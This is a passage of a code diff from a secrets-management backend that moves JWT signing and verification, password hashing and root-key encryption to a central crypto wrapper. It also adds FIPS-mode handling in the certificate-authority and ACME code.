-    const decodedToken = jwt.verify(refreshToken, appCfg.AUTH_SECRET) as AuthModeRefreshJwtTokenPayload;
+    const decodedToken = crypto.jwt().verify(refreshToken, appCfg.AUTH_SECRET) as AuthModeRefreshJwtTokenPayload;
 
     if (decodedToken.authTokenType !== AuthTokenType.REFRESH_TOKEN)
       throw new UnauthorizedError({

backend/src/services/auth/auth-fns.ts

@@ -1,6 +1,5 @@
-import jwt from "jsonwebtoken";
-
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { ForbiddenRequestError, UnauthorizedError } from "@app/lib/errors";
 
 import { AuthModeProviderJwtTokenPayload, AuthModeProviderSignUpTokenPayload, AuthTokenType } from "./auth-type";
@@ -8,7 +7,7 @@ import { AuthModeProviderJwtTokenPayload, AuthModeProviderSignUpTokenPayload, Au
 export const validateProviderAuthToken = (providerToken: string, username?: string) => {
   if (!providerToken) throw new UnauthorizedError();
   const appCfg = getConfig();
-  const decodedToken = jwt.verify(providerToken, appCfg.AUTH_SECRET) as AuthModeProviderJwtTokenPayload;
+  const decodedToken = crypto.jwt().verify(providerToken, appCfg.AUTH_SECRET) as AuthModeProviderJwtTokenPayload;
 
   if (decodedToken.authTokenType !== AuthTokenType.PROVIDER_TOKEN) throw new UnauthorizedError();
 
@@ -38,7 +37,7 @@ export const validateSignUpAuthorization = (token: string, userId: string, valid
     });
   }
 
-  const decodedToken = jwt.verify(AUTH_TOKEN_VALUE, appCfg.AUTH_SECRET) as AuthModeProviderSignUpTokenPayload;
+  const decodedToken = crypto.jwt().verify(AUTH_TOKEN_VALUE, appCfg.AUTH_SECRET) as AuthModeProviderSignUpTokenPayload;
   if (!validate) return decodedToken;
 
   if (decodedToken.authTokenType !== AuthTokenType.SIGNUP_TOKEN) throw new UnauthorizedError();
@@ -64,7 +63,7 @@ export const validatePasswordResetAuthorization = (token?: string) => {
     });
   }
 
-  const decodedToken = jwt.verify(AUTH_TOKEN_VALUE, appCfg.AUTH_SECRET) as AuthModeProviderSignUpTokenPayload;
+  const decodedToken = crypto.jwt().verify(AUTH_TOKEN_VALUE, appCfg.AUTH_SECRET) as AuthModeProviderSignUpTokenPayload;
 
   if (decodedToken.authTokenType !== AuthTokenType.SIGNUP_TOKEN) {
     throw new UnauthorizedError({

backend/src/services/auth/auth-login-service.ts

@@ -1,5 +1,3 @@
-import bcrypt from "bcrypt";
-import jwt from "jsonwebtoken";
 import { Knex } from "knex";
 
 import { OrgMembershipRole, OrgMembershipStatus, TableName, TUsers, UserDeviceSchema } from "@app/db/schemas";
@@ -7,8 +5,7 @@ import { EventType, TAuditLogServiceFactory } from "@app/ee/services/audit-log/a
 import { isAuthMethodSaml } from "@app/ee/services/permission/permission-fns";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { generateSrpServerKey, srpCheckClientProof } from "@app/lib/crypto";
+import { crypto, generateSrpServerKey, srpCheckClientProof } from "@app/lib/crypto";
-import { infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
 import { getUserPrivateKey } from "@app/lib/crypto/srp";
 import { BadRequestError, DatabaseError, ForbiddenRequestError, UnauthorizedError } from "@app/lib/errors";
 import { getMinExpiresIn, removeTrailingSlash } from "@app/lib/fn";
@@ -157,7 +154,7 @@ export const authLoginServiceFactory = ({
       }
     }
 
-    const accessToken = jwt.sign(
+    const accessToken = crypto.jwt().sign(
       {
         authMethod,
         authTokenType: AuthTokenType.ACCESS_TOKEN,
@@ -172,7 +169,7 @@ export const authLoginServiceFactory = ({
       { expiresIn: tokenSessionExpiresIn }
     );
 
-    const refreshToken = jwt.sign(
+    const refreshToken = crypto.jwt().sign(
       {
         authMethod,
         authTokenType: AuthTokenType.REFRESH_TOKEN,
@@ -336,8 +333,14 @@ export const authLoginServiceFactory = ({
         );
         return "";
       });
-      const hashedPassword = await bcrypt.hash(password, cfg.BCRYPT_SALT_ROUND);
+
-      const { iv, tag, ciphertext, encoding } = infisicalSymmetricEncypt(privateKey);
+      const hashedPassword = await crypto.hashing().createHash(password, cfg.SALT_ROUNDS);
+
+      const { iv, tag, ciphertext, encoding } = crypto
+        .encryption()
+        .symmetric()
+        .encryptWithRootEncryptionKey(privateKey);
+
       await userDAL.updateUserEncryptionByUserId(userEnc.userId, {
         serverPrivateKey: null,
         clientPublicKey: null,
@@ -388,7 +391,7 @@ export const authLoginServiceFactory = ({
     authJwtToken = authJwtToken.replace("Bearer ", ""); // remove bearer from token
 
     // The decoded JWT token, which contains the auth method.
-    const decodedToken = jwt.verify(authJwtToken, cfg.AUTH_SECRET) as AuthModeJwtTokenPayload;
+    const decodedToken = crypto.jwt().verify(authJwtToken, cfg.AUTH_SECRET) as AuthModeJwtTokenPayload;
     if (!decodedToken.authMethod) throw new UnauthorizedError({ name: "Auth method not found on existing token" });
 
     const user = await userDAL.findUserEncKeyByUserId(decodedToken.userId);
@@ -413,7 +416,7 @@ export const authLoginServiceFactory = ({
     if (shouldCheckMfa && (!decodedToken.isMfaVerified || decodedToken.mfaMethod !== mfaMethod)) {
       enforceUserLockStatus(Boolean(user.isLocked), user.temporaryLockDateEnd);
 
-      const mfaToken = jwt.sign(
+      const mfaToken = crypto.jwt().sign(
         {
           authMethod: decodedToken.authMethod,
           authTokenType: AuthTokenType.MFA_TOKEN,
@@ -624,7 +627,7 @@ export const authLoginServiceFactory = ({
       throw err;
     }
 
-    const decodedToken = jwt.verify(mfaJwtToken, getConfig().AUTH_SECRET) as AuthModeMfaJwtTokenPayload;
+    const decodedToken = crypto.jwt().verify(mfaJwtToken, getConfig().AUTH_SECRET) as AuthModeMfaJwtTokenPayload;
 
     const userEnc = await userDAL.findUserEncKeyByUserId(userId);
     if (!userEnc) throw new Error("Failed to authenticate user");
@@ -774,7 +777,7 @@ export const authLoginServiceFactory = ({
 
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
     const isUserCompleted = user.isAccepted;
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/services/auth/auth-password-service.ts

@@ -1,10 +1,7 @@
-import bcrypt from "bcrypt";
-import jwt from "jsonwebtoken";
-
 import { SecretEncryptionAlgo, SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { generateSrpServerKey, srpCheckClientProof } from "@app/lib/crypto";
-import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { generateUserSrpKeys } from "@app/lib/crypto/srp";
 import { BadRequestError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@@ -95,7 +92,7 @@ export const authPaswordServiceFactory = ({
     if (!isValidClientProof) throw new Error("Failed to authenticate. Try again?");
 
     const appCfg = getConfig();
-    const hashedPassword = await bcrypt.hash(password, appCfg.BCRYPT_SALT_ROUND);
+    const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS);
     await userDAL.updateUserEncryptionByUserId(userId, {
       encryptionVersion: 2,
       protectedKey,
@@ -175,7 +172,7 @@ export const authPaswordServiceFactory = ({
       code
     });
 
-    const token = jwt.sign(
+    const token = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.SIGNUP_TOKEN,
         userId: user.id
@@ -208,13 +205,13 @@ export const authPaswordServiceFactory = ({
         throw new BadRequestError({ message: "Current password is required." });
       }
 
-      const isValid = await bcrypt.compare(oldPassword, user.hashedPassword);
+      const isValid = await crypto.hashing().compareHash(oldPassword, user.hashedPassword);
       if (!isValid) {
         throw new BadRequestError({ message: "Incorrect current password." });
       }
     }
 
-    const newHashedPassword = await bcrypt.hash(newPassword, cfg.BCRYPT_SALT_ROUND);
+    const newHashedPassword = await crypto.hashing().createHash(newPassword, cfg.SALT_ROUNDS);
 
     // we need to get the original private key first for v2
     let privateKey: string;
@@ -225,12 +222,15 @@ export const authPaswordServiceFactory = ({
       user.serverEncryptedPrivateKeyEncoding &&
       user.encryptionVersion === UserEncryption.V2
     ) {
-      privateKey = infisicalSymmetricDecrypt({
+      privateKey = crypto
-        iv: user.serverEncryptedPrivateKeyIV,
+        .encryption()
-        tag: user.serverEncryptedPrivateKeyTag,
+        .symmetric()
-        ciphertext: user.serverEncryptedPrivateKey,
+        .decryptWithRootEncryptionKey({
-        keyEncoding: user.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+          iv: user.serverEncryptedPrivateKeyIV,
-      });
+          tag: user.serverEncryptedPrivateKeyTag,
+          ciphertext: user.serverEncryptedPrivateKey,
+          keyEncoding: user.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+        });
     } else {
       throw new BadRequestError({
         message: "Cannot reset password without current credentials or recovery method",
@@ -243,7 +243,7 @@ export const authPaswordServiceFactory = ({
       privateKey
     });
 
-    const { tag, iv, ciphertext, encoding } = infisicalSymmetricEncypt(privateKey);
+    const { tag, iv, ciphertext, encoding } = crypto.encryption().symmetric().encryptWithRootEncryptionKey(privateKey);
 
     await userDAL.updateUserEncryptionByUserId(userId, {
       hashedPassword: newHashedPassword,
@@ -285,7 +285,7 @@ export const authPaswordServiceFactory = ({
   }: TResetPasswordViaBackupKeyDTO) => {
     const cfg = getConfig();
 
-    const hashedPassword = await bcrypt.hash(password, cfg.BCRYPT_SALT_ROUND);
+    const hashedPassword = await crypto.hashing().createHash(password, cfg.SALT_ROUNDS);
 
     await userDAL.updateUserEncryptionByUserId(userId, {
       encryptionVersion: 2,
@@ -461,7 +461,7 @@ export const authPaswordServiceFactory = ({
 
       const cfg = getConfig();
 
-      const hashedPassword = await bcrypt.hash(password, cfg.BCRYPT_SALT_ROUND);
+      const hashedPassword = await crypto.hashing().createHash(password, cfg.SALT_ROUNDS);
 
       await userDAL.updateUserEncryptionByUserId(
         actor.id,

backend/src/services/auth/auth-signup-service.ts

@@ -1,13 +1,10 @@
-import bcrypt from "bcrypt";
-import jwt from "jsonwebtoken";
-
 import { OrgMembershipStatus, SecretKeyEncoding, TableName } from "@app/db/schemas";
 import { convertPendingGroupAdditionsToGroupMemberships } from "@app/ee/services/group/group-fns";
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { isAuthMethodSaml } from "@app/ee/services/permission/permission-fns";
 import { getConfig } from "@app/lib/config/env";
-import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { generateUserSrpKeys, getUserPrivateKey } from "@app/lib/crypto/srp";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { getMinExpiresIn } from "@app/lib/fn";
@@ -132,7 +129,7 @@ export const authSignupServiceFactory = ({
     await userDAL.updateById(user.id, { isEmailVerified: true });
 
     // generate jwt token this is a temporary token
-    const jwtToken = jwt.sign(
+    const jwtToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.SIGNUP_TOKEN,
         userId: user.id.toString()
@@ -193,7 +190,7 @@ export const authSignupServiceFactory = ({
       validateSignUpAuthorization(authorization, user.id);
     }
 
-    const hashedPassword = await bcrypt.hash(password, appCfg.BCRYPT_SALT_ROUND);
+    const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS);
     const privateKey = await getUserPrivateKey(password, {
       salt,
       protectedKey,
@@ -204,7 +201,7 @@ export const authSignupServiceFactory = ({
       tag: encryptedPrivateKeyTag,
       encryptionVersion: UserEncryption.V2
     });
-    const { tag, encoding, ciphertext, iv } = infisicalSymmetricEncypt(privateKey);
+    const { tag, encoding, ciphertext, iv } = crypto.encryption().symmetric().encryptWithRootEncryptionKey(privateKey);
     const updateduser = await authDAL.transaction(async (tx) => {
       const us = await userDAL.updateById(user.id, { firstName, lastName, isAccepted: true }, tx);
       if (!us) throw new Error("User not found");
@@ -225,12 +222,15 @@ export const authSignupServiceFactory = ({
         systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding
       ) {
         // get server generated password
-        const serverGeneratedPassword = infisicalSymmetricDecrypt({
+        const serverGeneratedPassword = crypto
-          iv: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyIV,
+          .encryption()
-          tag: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyTag,
+          .symmetric()
-          ciphertext: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKey,
+          .decryptWithRootEncryptionKey({
-          keyEncoding: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+            iv: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyIV,
-        });
+            tag: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyTag,
+            ciphertext: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKey,
+            keyEncoding: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+          });
         const serverGeneratedPrivateKey = await getUserPrivateKey(serverGeneratedPassword, {
           ...systemGeneratedUserEncryptionKey
         });
@@ -365,7 +365,7 @@ export const authSignupServiceFactory = ({
     });
     if (!tokenSession) throw new Error("Failed to create token");
 
-    const accessToken = jwt.sign(
+    const accessToken = crypto.jwt().sign(
       {
         authMethod: authMethod || AuthMethod.EMAIL,
         authTokenType: AuthTokenType.ACCESS_TOKEN,
@@ -378,7 +378,7 @@ export const authSignupServiceFactory = ({
       { expiresIn: tokenSessionExpiresIn }
     );
 
-    const refreshToken = jwt.sign(
+    const refreshToken = crypto.jwt().sign(
       {
         authMethod: authMethod || AuthMethod.EMAIL,
         authTokenType: AuthTokenType.REFRESH_TOKEN,
@@ -436,7 +436,7 @@ export const authSignupServiceFactory = ({
       });
 
     const appCfg = getConfig();
-    const hashedPassword = await bcrypt.hash(password, appCfg.BCRYPT_SALT_ROUND);
+    const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS);
     const privateKey = await getUserPrivateKey(password, {
       salt,
       protectedKey,
@@ -447,7 +447,7 @@ export const authSignupServiceFactory = ({
       tag: encryptedPrivateKeyTag,
       encryptionVersion: 2
     });
-    const { tag, encoding, ciphertext, iv } = infisicalSymmetricEncypt(privateKey);
+    const { tag, encoding, ciphertext, iv } = crypto.encryption().symmetric().encryptWithRootEncryptionKey(privateKey);
     const updateduser = await authDAL.transaction(async (tx) => {
       const us = await userDAL.updateById(user.id, { firstName, lastName, isAccepted: true }, tx);
       if (!us) throw new Error("User not found");
@@ -464,12 +464,15 @@ export const authSignupServiceFactory = ({
         systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding
       ) {
         // get server generated password
-        const serverGeneratedPassword = infisicalSymmetricDecrypt({
+        const serverGeneratedPassword = crypto
-          iv: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyIV,
+          .encryption()
-          tag: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyTag,
+          .symmetric()
-          ciphertext: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKey,
+          .decryptWithRootEncryptionKey({
-          keyEncoding: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+            iv: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyIV,
-        });
+            tag: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyTag,
+            ciphertext: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKey,
+            keyEncoding: systemGeneratedUserEncryptionKey.serverEncryptedPrivateKeyEncoding as SecretKeyEncoding
+          });
         const serverGeneratedPrivateKey = await getUserPrivateKey(serverGeneratedPassword, {
           ...systemGeneratedUserEncryptionKey
         });
@@ -552,7 +555,7 @@ export const authSignupServiceFactory = ({
     });
     if (!tokenSession) throw new Error("Failed to create token");
 
-    const accessToken = jwt.sign(
+    const accessToken = crypto.jwt().sign(
       {
         authMethod: AuthMethod.EMAIL,
         authTokenType: AuthTokenType.ACCESS_TOKEN,
@@ -564,7 +567,7 @@ export const authSignupServiceFactory = ({
       { expiresIn: appCfg.JWT_SIGNUP_LIFETIME }
     );
 
-    const refreshToken = jwt.sign(
+    const refreshToken = crypto.jwt().sign(
       {
         authMethod: AuthMethod.EMAIL,
         authTokenType: AuthTokenType.REFRESH_TOKEN,

backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts

@@ -1,10 +1,11 @@
 import { ChangeResourceRecordSetsCommand, Route53Client } from "@aws-sdk/client-route-53";
 import * as x509 from "@peculiar/x509";
 import acme from "acme-client";
-import { KeyObject } from "crypto";
 
 import { TableName } from "@app/db/schemas";
-import { BadRequestError, NotFoundError } from "@app/lib/errors";
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { BadRequestError, CryptographyError, NotFoundError } from "@app/lib/errors";
 import { OrgServiceActor } from "@app/lib/types";
 import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator";
 import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal";
@@ -102,6 +103,8 @@ export const route53InsertTxtRecord = async (
 ) => {
   const config = await getAwsConnectionConfig(connection, AWSRegion.US_WEST_1); // REGION is irrelevant because Route53 is global
   const route53Client = new Route53Client({
+    sha256: CustomAWSHasher,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
     credentials: config.credentials!,
     region: config.region
   });
@@ -187,6 +190,12 @@ export const AcmeCertificateAuthorityFns = ({
     enableDirectIssuance: boolean;
     actor: OrgServiceActor;
   }) => {
+    if (crypto.isFipsModeEnabled()) {
+      throw new CryptographyError({
+        message: "ACME is currently not supported in FIPS mode of operation."
+      });
+    }
+
     const { dnsAppConnectionId, directoryUrl, accountEmail, dnsProviderConfig } = configuration;
     const appConnection = await appConnectionDAL.findById(dnsAppConnectionId);
 
@@ -404,8 +413,9 @@ export const AcmeCertificateAuthorityFns = ({
     });
 
     const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+
-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const leafKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const skLeafObj = crypto.rawCrypto.KeyObject.from(leafKeys.privateKey);
     const skLeaf = skLeafObj.export({ format: "pem", type: "pkcs8" }) as string;
 
     const [, certificateCsr] = await acme.crypto.createCsr(

backend/src/services/certificate-authority/certificate-authority-fns.ts

@@ -1,6 +1,6 @@
 import * as x509 from "@peculiar/x509";
-import crypto from "crypto";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns";
 
@@ -133,8 +133,8 @@ export const getCaCredentials = async ({
   });
 
   const alg = keyAlgorithmToAlgCfg(ca.internalCa.keyAlgorithm as CertKeyAlgorithm);
-  const skObj = crypto.createPrivateKey({ key: decryptedPrivateKey, format: "der", type: "pkcs8" });
+  const skObj = crypto.rawCrypto.createPrivateKey({ key: decryptedPrivateKey, format: "der", type: "pkcs8" });
-  const caPrivateKey = await crypto.subtle.importKey(
+  const caPrivateKey = await crypto.rawCrypto.subtle.importKey(
     "pkcs8",
     skObj.export({ format: "der", type: "pkcs8" }),
     alg,
@@ -142,10 +142,14 @@ export const getCaCredentials = async ({
     ["sign"]
   );
 
-  const pkObj = crypto.createPublicKey(skObj);
+  const pkObj = crypto.rawCrypto.createPublicKey(skObj);
-  const caPublicKey = await crypto.subtle.importKey("spki", pkObj.export({ format: "der", type: "spki" }), alg, true, [
+  const caPublicKey = await crypto.rawCrypto.subtle.importKey(
-    "verify"
+    "spki",
-  ]);
+    pkObj.export({ format: "der", type: "spki" }),
+    alg,
+    true,
+    ["verify"]
+  );
 
   return {
     caSecret,
@@ -277,10 +281,14 @@ export const rebuildCaCrl = async ({
     cipherTextBlob: caSecret.encryptedPrivateKey
   });
 
-  const skObj = crypto.createPrivateKey({ key: privateKey, format: "der", type: "pkcs8" });
+  const skObj = crypto.rawCrypto.createPrivateKey({ key: privateKey, format: "der", type: "pkcs8" });
-  const sk = await crypto.subtle.importKey("pkcs8", skObj.export({ format: "der", type: "pkcs8" }), alg, true, [
+  const sk = await crypto.rawCrypto.subtle.importKey(
-    "sign"
+    "pkcs8",
-  ]);
+    skObj.export({ format: "der", type: "pkcs8" }),
+    alg,
+    true,
+    ["sign"]
+  );
 
   const revokedCerts = await certificateDAL.find({
     caId: ca.id,

backend/src/services/certificate-authority/certificate-authority-queue.ts

@@ -1,8 +1,8 @@
 import * as x509 from "@peculiar/x509";
-import crypto from "crypto";
 
 import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { daysToMillisecond, secondsToMillis } from "@app/lib/dates";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@@ -198,10 +198,14 @@ export const certificateAuthorityQueueFactory = ({
       cipherTextBlob: caSecret.encryptedPrivateKey
     });
 
-    const skObj = crypto.createPrivateKey({ key: privateKey, format: "der", type: "pkcs8" });
+    const skObj = crypto.rawCrypto.createPrivateKey({ key: privateKey, format: "der", type: "pkcs8" });
-    const sk = await crypto.subtle.importKey("pkcs8", skObj.export({ format: "der", type: "pkcs8" }), alg, true, [
+    const sk = await crypto.rawCrypto.subtle.importKey(
-      "sign"
+      "pkcs8",
-    ]);
+      skObj.export({ format: "der", type: "pkcs8" }),
+      alg,
+      true,
+      ["sign"]
+    );
 
     const revokedCerts = await certificateDAL.find({
       caId: ca.id,